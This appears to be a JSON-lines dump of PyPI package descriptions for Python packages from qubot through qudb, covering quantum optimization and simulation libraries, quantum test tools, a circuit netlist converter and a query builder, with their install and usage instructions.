\"date\": \"2021-01-01\",\n \"datetime-local\": \"2021-01-01T01:00\",\n \"email\": \"johndoe@gmail.com\",\n \"month\": \"2021-01\",\n \"number\": \"1\",\n \"password\": \"p@ssw0rd\",\n \"search\": \"query\",\n \"tel\": \"123-456-7890\",\n \"text\": \"text\",\n \"time\": \"00:00:00.00\",\n \"url\": \"https://www.google.com/\",\n \"week\": \"2021-W01\"\n\t}\n}Then, run the following code to set up and execute the Qubot tests.main.pyfrom qubot import Qubot\n\nqb = Qubot.from_file('./qu_config.json')\nqb.run()\nprint(qb.get_stats())Run in Command-Line via a Configuration FileQubot is automatically installed to your command line when you runpip install qubot.Assuming you've defined the configuration in./qu_config.json, enter the\nfollowing into your command line to run a test:qubot ./qu_config.jsonThe above will generate an output file calledqu_stats.jsonin the same directory. To change\nthe name of this output file, you can add the--output_file/-oflag:qubot ./qu_config.json -o output_stats.jsonSee this usage statement for more info on the command line utility:usage: qubot [-h] config_file [--output_file OUTPUT_FILE]Retrieving Test StatisticsWhat good is a testing suite without stats?To retrieve output statistics on your latest test run in code, simply callQubot(...).get_stats()This is\nexemplified above.Meanwhile, output statistics will be written to a file (default:qu_stats.json) if using the command line program.Statistics have no defined shape, but generally look like the following:{\n \"elements_encountered\": {\n \"count\": 80,\n \"events\": [\n \" (bccad3ad-f444-c74a-a440-631241a8dfc3)\",\n \" (12bf4d04-00df-2541-8b82-1476d4467471)\",\n \" (768ecfcb-5f5d-6945-96a6-6a8e6884d8a9)\",\n \" (34f6f1d4-7b65-5f4b-b92c-fa5ec96e480d)\",\n ...\n ]\n },\n \"elements_left_clicked\": {\n \"count\": 7,\n \"events\": [\n \"
(ad1272a9-2a5a-2844-b741-39a7fbaf6aff)\",\n ...\n ]\n },\n \"step_count\": 110000,\n \"reward_sum\": -1100000,\n \"training_rewards\": {\n \"count\": 1000,\n \"events\": [\n -1000,\n -2000,\n ...\n ]\n },\n \"epsilon_history\": {\n \"count\": 1000,\n \"events\": [\n 1.0,\n 0.9901493354116764,\n 0.9803966865736877,\n ...\n ]\n },\n \"testing_rewards\": {\n \"count\": 100,\n \"events\": [\n -1000,\n ...\n ]\n },\n \"testing_penalties\": {\n \"count\": 100,\n \"events\": [\n 100,\n ...\n ]\n }\n}AuthorsAnthony KrivonosPortfolio|GitHubKenneth ChuenGitHubCreated for theCOMSE6156 - Topics in Software Engineeringcourse at Columbia University in Spring 2021."} +{"package": "qubovert", "pacakge-description": "The one-stop package for formulating, simulating, and solving problems in boolean and spin form.master branchdev branchpypi distributionPlease see theRepositoryandDocs. For examples/tutorials, see thenotebooks.InstallationExample of the typical workflowCreate the boolean objective function to minimizeSolving the model with bruteforceSolving the model withqubovert\u2019s simulated annealingSolving the model with D-Wave\u2019s simulated annealerManaging QUBO, QUSO, PUBO, PUSO, PCBO, and PCSO formulationsBasic examples of common functionalityConvert common problems to quadratic form (theproblemslibrary)InstallationFor the stable release (same version as themasterbranch):pipinstallqubovertOr to install from source:gitclonehttps://github.com/jtiosue/qubovert.gitcdqubovertpipinstall-e.Then you can use it in Pythonversions 3.6 and abovewithimportqubovertasqvNote that to install from source on Windows you will needMicrosoft Visual C++ Build Tools 14installed.Example of the typical workflowHere we show an example of formulating a pseudo-boolean objective function. We can also make spin objective functions (Hamiltonians) in a very similar manner. See thenotebooksfor examples.Create the boolean objective function to minimizefromqubovertimportboolean_varN=10# create the variablesx={i:boolean_var('x(%d)'%i)foriinrange(N)}# minimize \\sum_{i=0}^{N-2} (1-2x_{i}) x_{i+1}model=0foriinrange(N-1):model+=(1-2*x[i])*x[i+1]# subject to the constraint that x_1 equals the XOR of x_3 and x_5# enforce with a penalty factor of 3model.add_constraint_eq_XOR(x[1],x[3],x[5],lam=3)# subject to the constraints that the sum of all variables is less than 4# enforce with a penalty factor of 5model.add_constraint_lt_zero(sum(x.values())-4,lam=5)Next we will show multiple ways to solve the model.Solving the model with bruteforceBefore using the bruteforce solver, always check thatmodel.num_binary_variablesis relatively small!model_solution=model.solve_bruteforce()print(\"Variable assignment:\",model_solution)print(\"Model value:\",model.value(model_solution))print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Solving the model withqubovert\u2019s simulated annealingPlease see the definition of PUBO in the next section. We will anneal the PUBO.fromqubovert.simimportanneal_pubores=anneal_pubo(model,num_anneals=10)model_solution=res.best.stateprint(\"Variable assignment:\",model_solution)print(\"Model value:\",res.best.value)print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Solving the model with D-Wave\u2019s simulated annealerD-Wave\u2019s simulated annealercannot anneal PUBOs as we did above. Instead the model must be reduced to a QUBO. See the next section for definitions of QUBO and PUBO.fromnealimportSimulatedAnnealingSampler# Get the QUBO form of the modelqubo=model.to_qubo()# D-Wave accept QUBOs in a different format than qubovert's format# to get the qubo in this form, use the .Q propertydwave_qubo=qubo.Q# solve with D-Waveres=SimulatedAnnealingSampler().sample_qubo(dwave_qubo,num_reads=10)qubo_solution=res.first.sample# convert the qubo solution back to the solution to the modelmodel_solution=model.convert_solution(qubo_solution)print(\"Variable assignment:\",model_solution)print(\"Model value:\",model.value(model_solution))print(\"Constraints satisfied?\",model.is_solution_valid(model_solution))Managing QUBO, QUSO, PUBO, PUSO, PCBO, and PCSO formulationsqubovertdefines, among many others, the following objects.QUBO: Quadratic Unconstrained Boolean Optimization (qubovert.QUBO)QUSO: Quadratic Unconstrained Spin Optimization (qubovert.QUSO)PUBO: Polynomial Unconstrained Boolean Optimization (qubovert.PUBO)PUSO: Polynomial Unconstrained Spin Optimization (qubovert.PUSO)PCBO: Polynomial Constrained Boolean Optimization (qubovert.PCBO)PCSO: Polynomial Constrained Spin Optimization (qubovert.PCSO)Each of the objects has many methods and arbitary arithmetic defined; see the docstrings of each object and thenotebooksfor more info. A boolean optimization model is one whose variables can be assigned to be either 0 or 1, while a spin optimization model is one whose variables can be assigned to be either 1 or -1. Thequbovert.boolean_var(name)function will create a PCBO representing the boolean variable with namename. Similarly, thequbovert.spin_var(name)function will create a PCSO representing the spin variable with namename.There are many utilities in theutilslibrary that can be helpful. Some examples of utility functions are listed here.qubovert.utils.solve_pubo_bruteforce, solve a PUBO by iterating through all possible solutions.qubovert.utils.solve_puso_bruteforce, solve a PUSO by iterating through all possible solutions.qubovert.utils.pubo_to_puso, convert a PUBO to a PUSO.qubovert.utils.puso_to_pubo, convert a PUSO to a PUBO.qubovert.utils.pubo_value, determine the value that a PUBO takes with a particular solution mapping.qubovert.utils.puso_value, determine the value that a PUSO takes with a particular solution mapping.qubovert.utils.approximate_pubo_extrema, approximate the minimum and maximum values that a PUBO can take; the true extrema will lie within these bounds.qubovert.utils.approximate_puso_extrema, approximate the minimum and maximum values that a PUSO can take; the true extrema will lie within these bounds.qubovert.utils.subgraph, create the subgraph of a model that only contains certain given variables.qubovert.utils.subvalue, create the submodel of a model with certain values of the model replaced with values.qubovert.utils.normalize, normalize a model such that its coefficients have a maximum absolute magnitude.Seequbovert.utils.__all__for more. Please note that all conversions between boolean and spin map {0, 1} to/from {1, -1} in that order! This is the convention thatqubovertuses everywhere.The PCBO and PCSO objects have constraint methods; for example, the.add_constraint_le_zeromethod will enforce that an expression is less than or equal to zero by adding a penalty to the model whenever it does not. The PCBO object also has constraint methods for satisfiability expressions; for example, the.add_constraint_ORwill enforce that the OR of the given boolean expression evaluates to True by adding a penalty to the model whenever it does not. See the docstrings andnotebooksfor more info.For more utilities on satisfiability expressions,qubovertalso has asatlibrary; seequbovert.sat.__all__. Consider the following 3-SAT example. We have variablesx0, x1, x2, x3, labeled by0, 1, 2, 3. We can create an expressionCthat evaluates to 1 whenever the 3-SAT conditions are satisfied.fromqubovert.satimportAND,NOT,ORC=AND(OR(0,1,2),OR(NOT(0),2,NOT(3)),OR(NOT(1),NOT(2),3))# C = 1 for a satisfying assignment, C = 0 otherwise# So minimizing -C will solve it.P=-Csolution=P.solve_bruteforce()Basic examples of common functionalitySee thenotebooksfor many fully worked out examples. Here we will just show some basic and brief examples.The basic building block of a binary optimization model is a Python dictionary. The keys of the dictionary are tuples of variable names, and the values are their corresponding coefficients. For example, in the below code block,model1,model2, andmodel3are equivalent.fromqubovertimportboolean_var,PUBOx0,x1,x2=boolean_var('x0'),boolean_var('x1'),boolean_var('x2')model1=-1+x0+2*x0*x1-3*x0*x2+x0*x1*x2model2={():-1,('x0',):1,('x0','x1'):2,('x0','x2'):-3,('x0','x1','x2'):1}model3=PUBO(model2)Similarly, in the below code block,model1,model2, andmodel3are equivalent.fromqubovertimportspin_var,PUSOz0,z1,z2=spin_var('z0'),spin_var('z1'),spin_var('z2')model1=-1+z0+2*z0*z1-3*z0*z2+z0*z1*z2model2={():-1,('z0',):1,('z0','z1'):2,('z0','z2'):-3,('z0','z1','z2'):1}model3=PUSO(model2)Let\u2019s take the same model from above (ie definemodel = model1.copy()). Suppose we want to find the ground state of the model subject to the constraints that the sum of the variables is negative and that the product ofz0andz1is 1. We have to enforce these constraints with a penalty calledlam. For now, let\u2019s set it as a Symbol that we can adjust later.fromsympyimportSymbollam=Symbol('lam')model.add_constraint_lt_zero(z0+z1+z2,lam=lam)model.add_constraint_eq_zero(z0*z1-1,lam=lam)Note that constraint methods can also be strung together if you want. So we could have written this asmodel.add_constraint_lt_zero(z0+z1+z2,lam=lam).add_constraint_eq_zero(z0*z1-1,lam=lam)The first thing you notice if youprint(model.variables)is that there are now new variables in the model called'__a0'and'__a1'. These are auxillary orancillavariables that are needed to enforce the constraints. The next thing to notice if youprint(model.degree)is that the model is a polynomial of degree 3. Many solvers (for example D-Wave\u2019s solvers) only solve degree 2 models. To get a QUBO or QUSO (which are degree two modes) frommodel, simply call the.to_quboor.to_qusomethods, which will reduce the degree to 2 by introducing more variables.qubo=model.to_qubo()quso=model.to_quso()Next let\u2019s solve the QUBO and/or QUSO formulations. First we have to substitute a value in for our placeholder symbollamthat is used to enforce the constraints. We\u2019ll just uselam=3for now.qubo=qubo.subs({lam:3})quso=quso.subs({lam:3})Here we will useD-Wave\u2019s simulated annealer.fromnealimportSimulatedAnnealingSampler# D-Wave represents QUBOs a little differently than qubovert does.# to get D-Wave's form, use the .Q propertydwave_qubo=qubo.Q# D-Wave represents QUSOs a little differently than qubovert does.# to get D-Wave's form, use the .h property the linear terms and the# .J property for the quadratic termsdwave_linear,dwave_quadratic=quso.h,quso.J# call dwavequbo_res=SimulatedAnnealingSampler().sample_qubo(dwave_qubo)quso_res=SimulatedAnnealingSampler().sample_ising(dwave_linear,dwave_quadratic)qubo_solution=qubo_res.first.samplequso_solution=quso_res.first.sampleNow we have to convert the solution in terms of the QUBO/QUSO variables back to a solution in terms of the original variables. We can then check if the proposed solution satisfies all of the constraints!converted_qubo_solution=model.convert_solution(qubo_solution)print(model.is_solution_valid(converted_qubo_solution))converted_quso_solution=model.convert_solution(quso_solution)print(model.is_solution_valid(converted_quso_solution))Convert common problems to quadratic form (theproblemslibrary)One of the goals ofqubovertis to become a large collection of problems mapped to QUBO and QUSO forms in order to aid the recent increase in study of these problems due to quantum optimization algorithms. Use Python\u2019shelpfunction! I have very descriptive doc strings on all the functions and classes. Please see thenotebooksfor a few more examples as well.See the following Set Cover example.fromqubovert.problemsimportSetCoverfromany_moduleimportqubo_solver# or you can use my bruteforce solver...# from qubovert.utils import solve_qubo_bruteforce as qubo_solverU={\"a\",\"b\",\"c\",\"d\"}V=[{\"a\",\"b\"},{\"a\",\"c\"},{\"c\",\"d\"}]problem=SetCover(U,V)Q=problem.to_qubo()obj,sol=qubo_solver(Q)solution=problem.convert_solution(sol)print(solution)# {0, 2}print(problem.is_solution_valid(solution))# will print True, since V[0] + V[2] covers all of Uprint(obj==len(solution))# will print TrueTo use the QUSO formulation instead:fromqubovert.problemsimportSetCoverfromany_moduleimportquso_solver# or you can use my bruteforce solver...# from qubovert.utils import solve_quso_bruteforce as quso_solverU={\"a\",\"b\",\"c\",\"d\"}V=[{\"a\",\"b\"},{\"a\",\"c\"},{\"c\",\"d\"}]problem=SetCover(U,V)L=problem.to_quso()obj,sol=quso_solver(L)solution=problem.convert_solution(sol)print(solution)# {0, 2}print(problem.is_solution_valid(solution))# will print True, since V[0] + V[2] covers all of Uprint(obj==len(solution))# will print TrueTo see problem specifics, runhelp(qubovert.problems.SetCover)help(qubovert.problems.VertexCover)# etc"} +{"package": "qubox-ufsc", "pacakge-description": "QuBOX UFSC ClientQuBOX is a portable quantum computing simulator developed by Quantuloop\nfor theKet language. Accelerated by GPU, QuBOX has two simulation modes,\nbeing able to simulate more than 30 quantum bits.In partnership with Quantuloop, the Quantum Computing Group - UFSC provides\nfree remote access to a QuBOX simulator. You can use this client to access\nthe QuBOX hosted at the Federal University of Santa Catarina (UFSC).Seehttps://qubox.ufsc.brfor more information.Installationpipinstallqubox-ufscUsagefromketimport*# import quantum types and functionsimportqubox_ufsc# import the QuBOX UFSC Client# Request access to the QuBOX UFSCqubox_ufsc.login(name=\"Your Name\",email=\"you_email@example.com\",affiliation=\"Your Affiliation\")# Configure the quantum executionqubox_ufsc.config(mode=\"sparse\",precision=1,)# Every quantum execution after this line will run on the QuBOX################################### Bell State preparation example ###################################a,b=quant(2)cnot(H(a),b)print(dump(a+b).show())"} +{"package": "qubricks", "pacakge-description": "UNKNOWN"} +{"package": "qub-sherlock", "pacakge-description": "sherlockmine a library of historical and on-going astronomical survey data in an attempt to identify the sources of transient/variable events, and predict their classifications based on crossmatched data.Documentation for sherlock is hosted byRead the Docs(development versionandmaster version). The code lives ongithub. Please report any issues you findhere.FeaturesHow to cite sherlockIf you usesherlockin your work, please cite using the following BibTeX entry:@software{Young_sherlock,author={Young, David R.},doi={10.5281/zenodo.8038058},license={GPL-3.0-only},title={{sherlock}},url={https://github.com/thespacedoctor/sherlock}}"} +{"package": "qubu", "pacakge-description": "QuBuQuBu is a simple database query builder for Python.Build statusFeaturesCurrently supported only some of MongoDB's main operators, such as:Logical query operators:$and,$or,$nor,$notComparison query operators:$eq,$gt,$gte,$in,$lt,$lte,$ne,$ninEvaluation query operators:$text,$regexGeospatial query operators:$near,$nearSphereRequirementsPython>=3.6DicMerInstallationpipinstallqubuUsageFollowing Python code:fromqubuimportAnd,Or,Not,Eq,Ne,Gte=Or(And(Eq('foo','bar'),Ne('bar','baz')),Not(Gt('salary',1500)),Eq('allowed',True),)e.compile()will give following object:{'$or':[{'$and':[{'foo':{'$eq':'bar'}},{'bar':{'$ne':'baz'}}]},{'salary':{'$not':{'$gt':1500}}},{'allowed':{'$eq':True}}]}DocumentationWork in progress.Testingpythonsetup.pytestContributingIf you want to contribute to a project and make it better, your help is very\nwelcome. Contributing is also a great way to learn more about social coding on\nGithub, new technologies and and their ecosystems and how to make constructive,\nhelpful bug reports, feature requests and the noblest of all contributions:\na good, clean pull request.Create a personal fork of the project on Github.Clone the fork on your local machine. Your remote repo on Github is calledorigin.Add the original repository as a remote calledupstream.If you created your fork a while ago be sure to pull upstream changes into\nyour local repository.Create a new branch to work on. Branch fromdevelopif it exists, else frommaster.Implement/fix your feature, comment your code.Follow the code style of the project, including indentation.If the project has tests run them.Write or adapt tests as needed.Add or change the documentation as needed.Squash your commits into a single commit with git's interactive rebase. Create\na new branch if necessary.Push your branch to your fork on Github, the remoteorigin.From your fork open a pull request in the correct branch. Target the project'sdevelopbranch if there is one, else go formaster.If the maintainer requests further changes just push them to your branch.Once the pull request is approved and merged you can pull the changes fromupstreamto your local repo and delete your extra branch(es).And last but not least: Always write your commit messages in the present tense.\nYour commit message should describe what the commit, when applied, does to the\ncode \u2013 not what you did to the code.RoadmapWrite documentation.SQL expressions support.SupportIf you have any issues or enhancement proposals feel free to report them via\nproject'sIssue Tracker.AuthorsOleksandr Shepetko-- initial work.CreditsNoneLicenseThis project is licensed under the MIT License. See theLICENSE.mdfile for details."} +{"package": "qucat", "pacakge-description": "QUCAT: QUantum Circuit Analyzer Tool.Seehttps://qucat.org/for installation, documentation, tutorials and more."} +{"package": "qucat-cover", "pacakge-description": "QuCAT: A Combinatorial Testing Tool for Quantum SoftwareDescriptionWith the increased developments in quantum computing, the availability of systematic and automatic testing approaches for quantum programs is becoming more and more essential. To this end, we present the quantum software testing tool QuCAT for combinatorial testing of quantum programs. QuCAT provides two functionalities of use. With the first functionality, the tool generates a test suite of a given strength (e.g., pair-wise). With the second functionality, it generates test suites with increasing strength until a failure is triggered or a maximum strength is reached. QuCAT uses two test oracles to check the correctness of test outputs. We assess the cost and effectiveness of QuCAT with 3 faulty versions of 5 quantum programs. Results show that combinatorial test suites with a low strength can find faults with limited cost, while a higher strength performs better to trigger some difficult faults with relatively higher cost.InstallationInstall Anaconda. You can download Anaconda for your OS fromhttps://www.anaconda.com/Install PICT. You can download PICT for your OS fromhttps://github.com/Microsoft/pictIf you add it into system variable, you don't need to specify PICT root in the configuration file introduced laterCreate a conda environment (e.g., with name \"qucat\"):conda create -n qucat python=3.9Activate the environment and install Qiskit and rpy2conda activate qucat\npip install qucat-coverHow to use QuCAT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.A sample quantum program is availablehere.Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot= \n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit= \n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID= \n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID= \n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas\n\n[qucat_configuration]\npict_root=\n;(Optional)\n;Description: The absolute root to run pict. If the root is added to system variable, users don't need to specify it. pict_root='.' by default.\nk=\n;(Optional)\n;Description: Order of combinations. In Functionality Two, it refers to the maximum value of strength. o = 2 by default. \nsignificance_level=\n;(Optional)\n;Description: The significance level for statistical test. significance_level = 0.01 by default.\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.A sample configuration file is availablehere.First, you need to activate the conda environment:conda activate qucatSecond, you can write the Python program as follows as an example:from qucat_cover.qucat_run import qucat\nqucat(1,\"/Users/user/qram_sample.ini\", \"\")There are three parameters for qucat method.Functionality, value can be either 1 or 2The root of the configuration fileThe root of the seedrow file. (\"\" represents no seedrow file)After all the preparation, QuCAT will generate test cases your requirement and execute to get results.After running, you get 2 text files. They containTest SuitesTest Outputs and Assessment ResultsVideo DemonstrationA video demo is availablehere.ExtensionOne can checkout the code from GitHub and provide extensions to QuCAT."} +{"package": "qucat-cover-gpu", "pacakge-description": "QuCAT: A Combinatorial Testing Tool for Quantum SoftwareDescriptionWith the increased developments in quantum computing, the availability of systematic and automatic testing approaches for quantum programs is becoming more and more essential. To this end, we present the quantum software testing tool QuCAT for combinatorial testing of quantum programs. QuCAT provides two functionalities of use. With the first functionality, the tool generates a test suite of a given strength (e.g., pair-wise). With the second functionality, it generates test suites with increasing strength until a failure is triggered or a maximum strength is reached. QuCAT uses two test oracles to check the correctness of test outputs. We assess the cost and effectiveness of QuCAT with 3 faulty versions of 5 quantum programs. Results show that combinatorial test suites with a low strength can find faults with limited cost, while a higher strength performs better to trigger some difficult faults with relatively higher cost.InstallationInstall Anaconda. You can download Anaconda for your OS fromhttps://www.anaconda.com/Install PICT. You can download PICT for your OS fromhttps://github.com/Microsoft/pictIf you add it into system variable, you don't need to specify PICT root in the configuration file introduced laterCreate a conda environment (e.g., with name \"qucat\"):conda create -n qucat python=3.9Activate the environment and install Qiskit and rpy2conda activate qucat\npip install qucat-cover-gpuHow to use QuCAT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named as 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in 'run' function.A sample quantum program is availablehere.Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot= \n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit= \n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID= \n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID= \n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas\n\n[qucat_configuration]\npict_root=\n;(Optional)\n;Description: The absolute root to run pict. If the root is added to system variable, users don't need to specify it. pict_root='.' by default.\nk=\n;(Optional)\n;Description: Order of combinations. In Functionality Two, it refers to the maximum value of strength. o = 2 by default. \nsignificance_level=\n;(Optional)\n;Description: The significance level for statistical test. significance_level = 0.01 by default.\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.A sample configuration file is availablehere.First, you need to activate the conda environment:conda activate qucatSecond, you can write the Python program as follows as an example:from qucat_cover.qucat_run import qucat\nqucat(1,\"/Users/user/qram_sample.ini\", \"\")There are three parameters for qucat method.Functionality, value can be either 1 or 2The root of the configuration fileThe root of the seedrow file. (\"\" represents no seedrow file)After all the preparation, QuCAT will generate test cases your requirement and execute to get results.After running, you get 2 text files. They containTest SuitesTest Outputs and Assessment ResultsVideo DemonstrationA video demo is availablehere.ExtensionOne can checkout the code from GitHub and provide extensions to QuCAT."} +{"package": "qucircuit", "pacakge-description": "Qucircuit \u2013 A quantum computing circuits simulatorRelease 2.2$ pip install qucircuitNow full support for quantum noise simulation.Includes state-vector and density-matrix based simulator backends.'Getting started' tutorial Jupyter notebooks, and documentation resources -Getting started tutorial Jupyter notebookGetting started with noise simulation tutorial Jupyter notebookExample implementations of various quantum algorithmsDeveloper documentation"} +{"package": "qucochemistry", "pacakge-description": "TheQu & Co Chemistrypackage is an open source library (licensed under Apache 2) for compiling and running quantum chemistry algorithms on Rigetti\u2019s Forest quantum computing platform.InstallationTo start using Qu & Co Chemistry library, you need to first install the Rigetti\u2019sForest SDKwhich contains both the Quantum Virtual Machine and the Rigetti\u2019s quantum compiler.You can install the library in two different ways.From PyPi or condaUsing pip install the latest version from PyPi within a virtual environment:python-mpipinstallqucochemistryAlternatively, the library can be installed within a conda environment:condainstall-cqucoqucochemistryFrom sourceUsing pip, install the library within a virtual environment:python-mpipinstall-rdeploy/requirements.txtpython-mpipinstall-e.Alternatively, install within a Conda environment using the provided environment:condaenvcreate-n-fdeploy/environment.ymlcondaactivatepython-mpipinstall-e.UsageIn order to use this library within your program, Rigetti\u2019s quantum virtual machine and quantum compilers must be running in the background.\nIf you run on Linux or OSX and the Rigetti\u2019sForest SDKis correctly installed, you can start them in the\nbackground with the following commands:screen-dm-Sqvmqvm-Sscreen-dm-Squilcquilc-SOn Windows just executeqvm -Sandquilc -Scommands in two separate cmd terminals.For more details on how to use the library, several tutorials on Jupyter notebook are availablehere.\nTo be able run end-to-end programs, you should install PySCF and OpenFermion-PySCF as additional dependencies with pip:python-mpipinstallopenfermionpyscfpyscfIf you created the Conda environment as described in the previous section, you should be able to install these dependencies within\nthe environment with the same command.With Docker containerThe library can also be used in Jupyter notebooks hosted within a Docker container. You should have bothdockeranddocker-composeinstalled in your system.To setup the Docker environment in the project root directory run:docker-composeup-dNow you can access a Jupyter notebook in your browser athttp://127.0.0.1:8888with Qu&Co Chemistry library available. Navigate to theexamples/folder to run the tutorial notebooks.DevelopmentThe unit tests are built using thepytestframework. In order to run them, install the qucochemistry package using the previous instruction\nand add the following dependencies:# for Conda environmentcondainstallpytestpytest-cov# for standard virtual environmentpython-mpipinstallpytestpytest-covThe tests can be executed in the root project directory as follows:pytest-v--cov=qucochemistryAn automatic code coverage report will be generated after running the above command. In order to visualize\nthe details of the code coverage for each module, an HTML report can be generated and rendered with your favorite\nbrowserpytest-v--cov=qucochemistry--cov-reporthtmlfirefoxhtmlcov/index.htmlHow to contributeWe\u2019d love to accept your contributions and patches to Qu & Co Chemistry.\nThere are a few guidelines you need to follow.\nContributions to Qu & Co Chemistry must be accompanied by a Contributor License Agreement.\nYou (or your employer) retain the copyright to your contribution,\nthis simply gives us permission to use and redistribute your contributions as part of the project.All submissions, including submissions by project members, require review.\nWe use GitHub pull requests for this purpose. ConsultGitHub Helpfor\nmore information on using pull requests.\nFurthermore, please make sure your new code comes with extensive tests!\nWe use automatic testing to make sure all pull requests pass tests and do not\ndecrease overall test coverage by too much. Make sure you adhere to our style\nguide. Just have a look at our code for clues. We mostly followPEP 8and use\nthe correspondinglinterto check for it.\nCode should always come with documentation.AuthorsVincent Elfving(Qu & Co B.V.)We are happy to include future contributors as authors on later Qu & Co Chemistry releases.DisclaimerCopyright 2019"} +{"package": "qucode", "pacakge-description": "No description available on PyPI."} +{"package": "qucs2gerber", "pacakge-description": "#qucs2gerber PackageInstallation:python3 -m pip install --user qucs2gerberUsage:python3 -m qucs2gerber -s qucs_schematic.sch -o gerber_file.grbProject Website:qucs2gerber GitHub Project"} +{"package": "qucs-netlist", "pacakge-description": "qucs-netlistThe Python package can be found herehttps://pypi.org/and can be installed with\npip install qucs-netlist==0.0.5Converts Qucs schematic files into a form suitable for a PCB design application. It uses a Qucs schematic file to add components to a netlist file. If there is also a Qucs .sim file with the same name but the .sim extension, it will use that to create the nets, if not it will attempt to run Qucs to create a .sim file, if Qucs has been installed that should succeed, but it won't work from qucs-s. If no .sim file was present and can't be created, the output netlist file will contain components but no nets.INSTALLATION\nAssuming your system already has Python3 and PIP installed, type:\npython3 -m pip install PopoutApps-qucs-netlistRUNNING\nTo process a schematic file in your current directory, type:\npython3 -m PopoutApps.qucs-netlist mycircuit.schThe output file will be called mycircuit.netIf you run it again it will not overwrite the existing file, unless you add a 'y' at the end of the line:\npython3 -m PopoutApps.qucs-netlist mycircuit.schERRORS\nThe program will print a warning line for each component which is not yet in the reference data file:\nWarning: Unknown component type not converted: D2 DiacThe program may call a qucs process which produces many lines (100+) of errors in the terminal. They are mostly to do with missing fonts and don't affect the output file. Ignore these.SCOPE\nThere is a maximum 100 components.\nThe exported file can be imported by DIY Layout Creator (available from their website or from Flathub) and VeroRoute, but it could be imported into any application provided it accepted the component types in the reference data file. Alternatively another .dat file could be provided with component names acceptable to the application."} +{"package": "qucumber", "pacakge-description": "A Quantum Calculator Used for Many-body Eigenstate ReconstructionQuCumber is a program that reconstructs an unknown quantum wavefunction\nfrom a set of measurements. The measurements should consist of binary counts;\nfor example, the occupation of an atomic orbital, or angular momentum eigenvalue of\na qubit. These measurements form a training set, which is used to train a\nstochastic neural network called a Restricted Boltzmann Machine. Once trained, the\nneural network is a reconstructed representation of the unknown wavefunction\nunderlying the measurement data. It can be used for generative modelling, i.e.\nproducing new instances of measurements, and to calculate estimators not\ncontained in the original data set.QuCumber is developed by the Perimeter Institute Quantum Intelligence Lab (PIQuIL).FeaturesQuCumber implements unsupervised generative modelling with a two-layer RBM.\nEach layer is a number of binary stochastic variables (with values 0 or 1). The\nsize of the visible layer corresponds to the input data, i.e. the number of\nqubits. The size of the hidden layer is a hyperparameter, varied to systematically control\nrepresentation error.Currently, quantum state reconstruction/tomography can be performed on both pure and mixed states.\nPure state reconstruction can be further broken down into positive or complex wavefunction reconstruction.\nIn the case of a positive wavefunction, data is only required in one basis. For complex wavefunctions as\nwell as mixed states, measurement data in additional bases will be required to train the state.DocumentationDocumentation can be foundhere.See \"QuCumber: wavefunction reconstruction with neural networks\"https://scipost.org/SciPostPhys.7.1.009Getting StartedThese instructions will get you a copy of the project up and running on your\nlocal machine for development and testing purposes.InstallingIf you're on Windows, you will have to install PyTorch manually; instructions\ncan be found on their website:pytorch.org.You can install the latest stable version of QuCumber, along with its dependencies,\nusingpip:pipinstallqucumberIf, for some reason,pipfails to install PyTorch, you can find installation\ninstructions on their website. Once that's done you should be able to install\nQuCumber throughpipas above.QuCumber supports Python 3.6 and newer stable versions.Installing the bleeding-edge versionIf you'd like to install the most upto date, but potentially unstable version,\nyou can clone the repository's master branch and then build from source like so:gitclonegit@github.com:PIQuIL/QuCumber.gitcd./QuCumber\npythonsetup.pyinstallContributingPlease readCONTRIBUTING.mdfor details on how to contribute\nto the project, and the process for submitting pull requests to us.LicenseQuCumber is licensed under the Apache License Version 2.0, this includes almost\nall files in this repo. However, some miscellaneous files may be licensed\ndifferently. SeeLICENSEfor more details.Citation@Article{10.21468/SciPostPhys.7.1.009,\n title={{QuCumber: wavefunction reconstruction with neural networks}},\n author={Matthew J. S. Beach and Isaac De Vlugt and Anna Golubeva and Patrick Huembeli and Bohdan Kulchytskyy and Xiuzhe Luo and Roger G. Melko and Ejaaz Merali and Giacomo Torlai},\n journal={SciPost Phys.},\n volume={7},\n issue={1},\n pages={9},\n year={2019},\n publisher={SciPost},\n doi={10.21468/SciPostPhys.7.1.009},\n url={https://scipost.org/10.21468/SciPostPhys.7.1.009},}AcknowledgmentsWe thank M. Albergo, G. Carleo, J. Carrasquilla, D. Sehayek, and\nL. Hayward Sierens for many helpful discussions.We thank thePerimeter Institutefor the\ncontinuing support of PIQuIL.Thanks to Nick Mercer for creating our awesome logo. You can check out more of\nNick's work by visitinghis portfolioon Behance!"} +{"package": "qudb", "pacakge-description": "Manage a database of questions and use it to generate assessments, e.g.\nassignments, quizzes, and exams.qudbis a personal question bank for instructors. It allows you to:Manage your collection of questions for a given course, and assemble\nvarious assessments out of them.Track how you are using your questions. Query your database forquestions,terms,assessments, orassessment types.Anassessment typerefers to a type of assessments that recur at\nmost once every term, such 